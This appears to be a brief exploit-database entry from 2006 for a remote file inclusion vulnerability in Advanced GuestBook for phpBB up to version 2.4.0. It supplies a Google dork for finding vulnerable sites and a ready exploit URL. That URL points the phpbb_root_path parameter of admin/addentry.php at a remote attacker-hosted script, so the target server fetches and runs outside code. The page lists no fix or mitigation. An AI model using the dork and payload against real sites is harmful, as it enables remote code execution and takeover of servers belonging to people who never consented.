Advanced GuestBook <= 2.4.0 (phpBB) File Inclusion Vulnerability

2006-04-28 00:00:00

Title: Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion
Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
Credits: [Oo]

Exploit: http://[url]/[phpbb_path]/admin/addentry.php?phpbb_root_path=http://[badscript]?

#

Fixes

No fixes

In order to submit a new fix you need to be registered.